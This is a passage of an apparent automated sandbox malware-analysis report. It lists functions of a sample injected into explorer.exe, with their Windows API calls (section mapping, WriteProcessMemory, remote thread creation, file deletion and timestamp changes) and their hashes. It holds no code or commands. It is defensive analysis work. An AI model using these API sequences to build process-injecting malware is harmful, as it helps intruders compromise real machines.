Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

Function 00402F5D Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403091
NtTerminateProcess.NTDLL ref: 004030AA

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

Function 004030BF Relevance: 3.1, APIs: 2, Instructions: 82
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403091
NtTerminateProcess.NTDLL ref: 004030AA

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Strings

zOji, xrefs: 004018C5

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID: zOji
API String ID: 4152845823-4118548424
Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

Non-executed Functions

Function 004022D9 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB

Function 004022D8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB

Function 004022E5 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97

Function 004022F7 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B

Function 00402321 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7

Function 004025D3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91

Function 00402920 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704

Function 00402686 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

Analysis Process: explorer.exePID: 3968, Parent PID: 8012COMMON

Execution Graph

Execution Coverage:	59.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.6%
Total number of Nodes:	142
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02492FAC Relevance: 7.9, APIs: 5, Instructions: 360
nativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02494760: NtCreateSection.NTDLL ref: 024947D2

NtQueryInformationProcess.NTDLL ref: 024931A2
NtQueryInformationProcess.NTDLL ref: 024931CA
ReadProcessMemory.KERNEL32 ref: 024931FD
ReadProcessMemory.KERNEL32 ref: 0249322B
WriteProcessMemory.KERNEL32 ref: 024932A8

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
String ID:
API String ID: 1349948393-0
Opcode ID: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
Instruction ID: fe501c5e88438140bc53dcea084013a7de331407b212fbfbfb255ca244e1cb53
Opcode Fuzzy Hash: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
Instruction Fuzzy Hash: 49B18031A18A4C8FDB58EF68D4456A9B7F2FB98310F10427ED84AE7255DB30E9068BC5

Function 02493BF4 Relevance: 7.6, APIs: 5, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 02493C16
Process32First.KERNEL32 ref: 02493C35
Process32Next.KERNEL32 ref: 02493C80
CloseHandle.KERNEL32 ref: 02493C8D
SleepEx.KERNEL32 ref: 02493C98

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction ID: c3e73344199daf2a68060841e52e793276c4b441605960dd908af421b78e8cd1
Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction Fuzzy Hash: A221A531118A088FDF14EF64C4887AA7AE2FB89319F1406BFD44BDA255DB349585C751

Function 02494760 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 024947D2

Strings

@, xrefs: 024947EA
@, xrefs: 024947CA

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: CreateSection
String ID: @$@
API String ID: 2449625523-149943524
Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction ID: 313dd531fb39fa4983e8aa12194a31cda554dca7a7e464d6f7543a13eadb5e4d
Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction Fuzzy Hash: 07316D74908B898FCF94EF58C88866ABBE4FB58305F10066FE85DE3251DB70D841CB81

Function 024935E8 Relevance: 1.9, APIs: 1, Instructions: 412
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE ref: 02493635

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
Instruction ID: 9f941e53f8e3507980b79213038421e034518e00ae9962c6d6c22fc90ddd970c
Opcode Fuzzy Hash: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
Instruction Fuzzy Hash: 96E1D934608A488FCF94EF28C895F9AB7F1FFA9305F114699E44ACB265DB70E944CB41

Function 02493490 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 024934E4

Part of subcall function 024935E8: CoCreateInstance.COMBASE ref: 02493635

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstanceNameUser
String ID:
API String ID: 3213660374-0
Opcode ID: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
Instruction ID: 13d80858990948ed281db0544b3ac3ee8bfe2e059a4aa3027de295373e09ca02
Opcode Fuzzy Hash: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
Instruction Fuzzy Hash: A211DA30718B4C4FCFA4EF69905875EBAE2FBDC310F904A6E984DC7255DA7489458B81

Function 024919D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 299
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 02491AE7
CreateThread.KERNEL32 ref: 02491CA2
CloseHandle.KERNEL32 ref: 02491CAB
CreateThread.KERNEL32 ref: 02491CC9

Strings

%g?, xrefs: 02491A37
iP+, xrefs: 02491C32

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$CloseHandleHeap
String ID: %g?$iP+
API String ID: 371905858-765743493
Opcode ID: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
Instruction ID: 01ec4afefe41f26f3a2a125acb3dac21ee17e1ab2328b38d6da8b981e4dd5d7b
Opcode Fuzzy Hash: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
Instruction Fuzzy Hash: E591C630618A0A8FDF54EF19D891AA577D6FB98300B48017EDC4ECB256DB34E942DB92

Function 02491F04 Relevance: 7.7, APIs: 5, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 02491F8E
CopyFileW.KERNEL32 ref: 02491F9D
DeleteFileW.KERNEL32 ref: 02491FAE
DeleteFileW.KERNEL32 ref: 02491FF9

Part of subcall function 02494920: SetFileAttributesW.KERNEL32 ref: 0249496F
Part of subcall function 02494920: CreateFileW.KERNEL32 ref: 02494999
Part of subcall function 02494920: SetFileTime.KERNEL32 ref: 024949C4

CreateFileW.KERNEL32 ref: 02492085

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCopyTime
String ID:
API String ID: 642576546-0
Opcode ID: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
Instruction ID: 1240213fdb7e289e3f5dc1aba836ae925e0acd94e6c5441314baaedffa3277a9
Opcode Fuzzy Hash: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
Instruction Fuzzy Hash: 6D414A30718A4C4FCFA8AFAD945876E7AD2EB8C310F50457EA90EC7385DE749D068B81

Function 0249230C Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 024924E9
CreateFileW.KERNEL32 ref: 02492512
WriteFile.KERNEL32 ref: 02492572

Strings

|:|, xrefs: 0249242C

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteWrite
String ID: |:|
API String ID: 2199199414-3736120136
Opcode ID: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
Instruction ID: 04959b91772042729cdd83233fda7618489f391c6a20bf147c0088bc47460b0e
Opcode Fuzzy Hash: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
Instruction Fuzzy Hash: D1E18730718F484BDB69EB6884597AA7BD1FB98315F10062FD89FC3281DF74E9428786

Function 02491D8C Relevance: 4.6, APIs: 3, Instructions: 121
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02494C90: GetVolumeInformationA.KERNEL32 ref: 02494CFD

CreateMutexExA.KERNEL32 ref: 02491DFF
CreateFileMappingA.KERNEL32 ref: 02491EB1
SleepEx.KERNEL32 ref: 02491EEE

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileInformationMappingMutexSleepVolume
String ID:
API String ID: 3744091137-0
Opcode ID: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
Instruction ID: bb35f8775d6ed041ba4bec9243b89a1ceeee63f660d358e5f50f8a9f933d9727
Opcode Fuzzy Hash: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
Instruction Fuzzy Hash: D4415E30714F088FDF65EB7980587AA7AD2EB98306F504A2E905ED6240CFB496029B81

Function 02494920 Relevance: 4.6, APIs: 3, Instructions: 84
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 0249496F
CreateFileW.KERNEL32 ref: 02494999
SetFileTime.KERNEL32 ref: 024949C4

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateTime
String ID:
API String ID: 1986686026-0
Opcode ID: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
Instruction ID: f1ba2a4baa26ef986fd424a71ab431113f3ac9eac0ead6f34776c4933b90440d
Opcode Fuzzy Hash: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
Instruction Fuzzy Hash: 2B21333070CB488FDF64EF68948879E76E2FBDC701F10456EA84EC7245DA34DA058782

Function 02492CD0 Relevance: 3.3, APIs: 2, Instructions: 254
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 024932EC: CreateFileW.KERNEL32 ref: 02493332
Part of subcall function 024932EC: ReadFile.KERNEL32 ref: 02493379

ResumeThread.KERNEL32 ref: 02492EFE
SleepEx.KERNEL32 ref: 02492F43

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateReadResumeSleepThread
String ID:
API String ID: 3143597149-0
